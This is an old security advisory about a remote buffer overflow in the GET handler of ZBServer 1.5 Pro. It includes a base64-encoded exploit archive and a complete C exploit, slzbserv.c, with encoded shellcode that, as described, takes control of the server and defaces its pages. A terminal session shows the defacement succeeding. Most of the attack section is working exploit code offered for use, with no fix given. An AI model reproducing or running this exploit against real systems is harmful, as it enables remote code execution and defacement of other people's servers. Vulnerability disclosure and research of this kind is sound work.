COMMAND
ZBServer
SYSTEMS AFFECTED
ZBServer 1.5 Pro Edition for Win98/NT and possibly others versions
PROBLEM
USSR Labs found following. ZBServer Pro Edition is a
full-featured Internet/Intranet server software package that
includes HTTP (web), Gopher, FTP and Chat Services. Fast,
inexpensive and easy-to-use, ZBServer Pro is small enough to run
in the background of your Windows 95 or NT computer to provide
users with full or restricted access to files, graphics, sounds
or movies. ZBServer Pro can provide organizations of all sizes
enterprise-wide web service to internal and external TCP/IP
network users.
UssrLabs found a Local/Remote Buffer overflow. The code that
handles GET commands has an unchecked buffer that will allow
arbitrary code to be executed if it is overflowed.
For binary or source of this exploit go to:
http://www.ussrback.com/
Mimed source follows:
---
Content-Type: application/octet-stream; name="zbs15exp.zip"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="zbs15exp.zip"
Content-MD5: ZevxKub3xk++T1mzHZZymQ==
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
AAA=
-----
|Zan added following. USSRBACK found an buffer overflow in
ZBServer (GET command). Well, it is an exploit tested on WinNT
4.0 (spanish version). It comes back with a raw eip in code (not
jumps against "call register" or "jmp register"). If you want a
real portable exploit you can replace last four bytes against a
call edi + x where x > 10 bytes.
ZBServer PRO's WebServer has an overflow in "get command". It
can't handle a long excesive request. When the string has a
lenght about 766 bytes it crashs. The stack is overwritten.
|Zan exploited and finished its exploit for WinNT and it's
attached with this advisory. Arbitrary code can run with
webserver privileges. Win9x version can't be exploitable with a
clear environment. If you have a default debugger configuration
or your processes are handled by a special process hooking errors
and exceptions then it can be exploited too but it won't be the
common scenary. Win9x version can't run arbitrary code with a
clear environment but a DoS attack is possible. You can crash
the service with a local/remote request.
ZBServer PRO 1.50-r1x exploit gets remote servers's full control.
When you attacks a vulnerable server you can run abitrary code
inside. Firstly, sploit creates an advisory file. It's
information for administrative use. Later, exploit restores and
kills overflowed thread but before it patchs some error
information so all error pages will appear like hacked pages. If
you have problems running ZBServer they can be with your return
address (remember that tests ran against WinNT sp5 spanish
version). One could jump against edi register + 5 (more portable)
but we will have a static dll address dependence. Well, it wasn't
a clear jump so |Zan decided to implement the first technique but
the second is possible too. Example:
% lynx http://xxx.xxx.xxx.xxx
WELCOME TO ... blah ... blah ..... (It's the root page)
% lynx xxx.xxx.xxx.xxx/ServerAbusedbyiZan.html
FILE NOT FOUND The request object (/ServerAbusedbyiZan.html) was
not found.
% lynx xxx.xxx.xxx.xxx/FileNotAvailable.html
FILE NOT FOUND The request object (/FileNotAvailable.html) was not
found.
$ zbsploit xxx.xxx.xxx.xxx
WinNT 4.0 sp5 ZBServer 1.50-r1x exploit http://mareasvivas.cjb.net -
http://www.deepzone.org
Coded by -=[|Zan]=- izan@galaxycorp.com - izan@deepzone.org
done.
$ lynx http://xxx.xxx.xxx.xxx
WELCOME TO ... blah ... blah ..... (It's the root page again)
% lynx http://xxx.xxx.xxx.xxx/ServerAbusedbyiZan.html
Hello. You are running a ZBServer PRO's buggy version and
you have been abused.
More information can be downloaded from
http://www.deepzone.org or http://mareasvivas.cjb.net
regards to DeepZone crew (TheWizard, ^Anuska^ and Nemo)
Coded by |Zan.
% lynx xxx.xxx.xxx.xxx/FileNotAvailable.html
Server hacked.
http://www.deepzone.org Sploit coded by |Zan
%_
Here is the exploit:
/** slzbserv.c - local/remote exploit for ZBServer PRO 1.50-r1x (WinNT)
**
** ZBServer PRO 1.50-r1x exploit gets remote servers's full control.
** When you attacks a vulnerable server you can run abitrary code
** inside. Firstly, sploit creates an advisory file. It's information
** for administrative use. Later, exploit restores and kills
** overflowed thread but before it patchs some error information so
** all error pages will appear like hacked pages.
**
** Compile on Debian with kernel 2.2.12: gcc -o slzbserv slzbserv.c
** run: ./slzbserv hostname
**
** http://mareasvivas.cjb.net / http://www.deepzone.org
**
** Coded by |Zan | izan@galaxycorp.com
**
**/
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/errno.h>
#include <netdb.h>
#define _PORT 80
#define _TamBuf 770
char crash[] =
"GET /"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x81\xc7\xc8\x10\x10\x10\x81\xef\x10"
"\x10\x10\x10\x57\x5e\x33\xc0\x66\xb8\x31\x02\x90\x90\x50"
"\x59\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99\xc4\x18"
"\x74\xb1\x89\xd9\x99\xf3\x99\xf1\x19\x99\x99\x99\xf3\x9b"
"\xf3\x99\xf3\x99\xf1\x99\x99\x99\xd9\x14\x2c\xac\x8b\xd9"
"\x99\xcf\xf1\x19\x02\xd4\x99\xc3\x66\x8b\xc9\xc2\xf3\x99"
"\x14\x24\x3a\x89\xd9\x99\xaa\x59\x32\x14\x2c\x3a\x89\xd9"
"\x99\xcf\xf1\xd3\x98\x99\x99\x09\x14\x2c\x72\x89\xd9\x99"
"\xcf\xca\xf1\x49\x05\xd4\x99\xc3\x66\x8b\xca\xf1\x05\x02"
"\xd4\x99\xc3\x66\x8b\xf1\xa9\xd4\xde\x99\xc6\x14\x2c\x3e"
"\x89\xd9\x99\xf3\xdd\x09\x09\x09\x09\xc0\x35\x33\x7b\x65"
"\xf3\x99\x23\x31\x02\xd4\x99\x66\x8b\x99\x99\x99\x99\xca"
"\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc\xfd\xb7\xa5"
"\xb6\xf1\xab\xa7\xf1\xed\xed\xe9\xa3\xb6\xb6\xee\xee\xee"
"\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\xfe\xb9"
"\xb9\xca\xe9\xf5\xf6\xf0\xed\xb9\xfa\xf6\xfd\xfc\xfd\xb9"
"\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xe4\xa3\xb0\xa5\xf1\xed"
"\xf4\xf5\xa7\xa5\xf1\xfc\xf8\xfd\xa7\xa5\xed\xf0\xed\xf5"
"\xfc\xa7\xca\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc"
"\xfd\xb7\xa5\xb6\xed\xf0\xed\xf5\xfc\xa7\xa5\xb6\xf1\xfc"
"\xf8\xfd\xa7\xa5\xfb\xf6\xfd\xe0\xa7\xa5\xfa\xfc\xf7\xed"
"\xfc\xeb\xa7\xd1\xfc\xf5\xf5\xf6\xb7\xb9\xc0\xf6\xec\xb9"
"\xf8\xeb\xfc\xb9\xeb\xec\xf7\xf7\xf0\xf7\xfe\xb9\xf8\xb9"
"\xc3\xdb\xca\xfc\xeb\xef\xfc\xeb\xb9\xc9\xcb\xd6\xea\xb9"
"\xfb\xec\xfe\xfe\xe0\xb9\xef\xfc\xeb\xea\xf0\xf6\xf7\xb9"
"\xf8\xf7\xfd\xb9\xe0\xf6\xec\xb9\xf1\xf8\xef\xfc\xb9\xfb"
"\xfc\xfc\xf7\xb9\xf8\xfb\xec\xea\xfc\xfd\xb7\xa5\xe9\xa7"
"\xd4\xf6\xeb\xfc\xb9\xf0\xf7\xff\xf6\xeb\xf4\xf8\xed\xf0"
"\xf6\xf7\xb9\xfa\xf8\xf7\xb9\xfb\xfc\xb9\xfd\xf6\xee\xf7"
"\xf5\xf6\xf8\xfd\xb9\xff\xeb\xf6\xf4\xb9\xf1\xed\xed\xe9"
"\xa3\xb6\xb6\xee\xee\xee\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7"
"\xfc\xb7\xf6\xeb\xfe\xb9\xf6\xeb\xb9\xf1\xed\xed\xe9\xa3"
"\xb6\xb6\xf4\xf8\xeb\xfc\xf8\xea\xef\xf0\xef\xf8\xea\xb7"
"\xfa\xf3\xfb\xb7\xf7\xfc\xed\xa5\xe9\xa7\xeb\xfc\xfe\xf8"
"\xeb\xfd\xea\xb9\xed\xf6\xb9\xdd\xfc\xfc\xe9\xc3\xf6\xf7"
"\xfc\xb9\xfa\xeb\xfc\xee\xb9\xb1\xcd\xf1\xfc\xce\xf0\xe3"
"\xf8\xeb\xfd\xb5\xb9\xd8\xf7\xec\xea\xf2\xf8\xb9\xf8\xf7"
"\xfd\xb9\xd7\xfc\xf4\xf6\xb0\xa5\xe9\xa7\xda\xf6\xfd\xfc"
"\xfd\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb7\xa5\xb6\xfa\xfc"
"\xf7\xed\xfc\xeb\xa7\xa5\xb6\xfb\xf6\xfd\xe0\xa7\xa5\xb6"
"\xf1\xed\xf4\xf5\xa7\xb7\xc5\xf1\xed\xf4\xf5\xc5\xca\xfc"
"\xeb\xef\xfc\xeb\xd8\xfb\xec\xea\xfc\xfd\xfb\xe0\xf0\xc3"
"\xf8\xf7\xb7\xf1\xed\xf4\xf5\x99\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\xac\xe0\xe3\x01";
int sock;
struct sockaddr_in sock_a;
struct hostent *host;
int main (int argc, char *argv[]) {
printf("\nWinNT 4.0 sp5 ZBServer PRO 1.50-r1x exploit\n");
printf("http://mareasvivas.cjb.net - http://www.deepzone.org\n\n");
printf("Coded by -=[ |Zan ]=- izan@galaxycorp.com - izan@deepzone.org\n\n");
if(argc < 2) {
fprintf(stderr, "Error : Usage: %s <hostname> \n", argv[0]);
exit(0);
}
if((host=(struct hostent *)gethostbyname(argv[1])) == NULL) {
perror("gethostbyname");
exit(-1);
}
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
perror("create socket");
exit(-1);
}
sock_a.sin_family=AF_INET;
sock_a.sin_port=htons(_PORT);
memcpy((char *)&sock_a.sin_addr,(char *)host->h_addr,host->h_length);
if(connect(sock,(struct sockaddr *)&sock_a,sizeof(sock_a))!=0) {
perror("create connect");
exit(-1);
}
fflush(stdout);
write(sock,crash,_TamBuf);
write(sock,"\n\n", 2);
printf("done.\n\n");
}
SOLUTION
Nothing yet.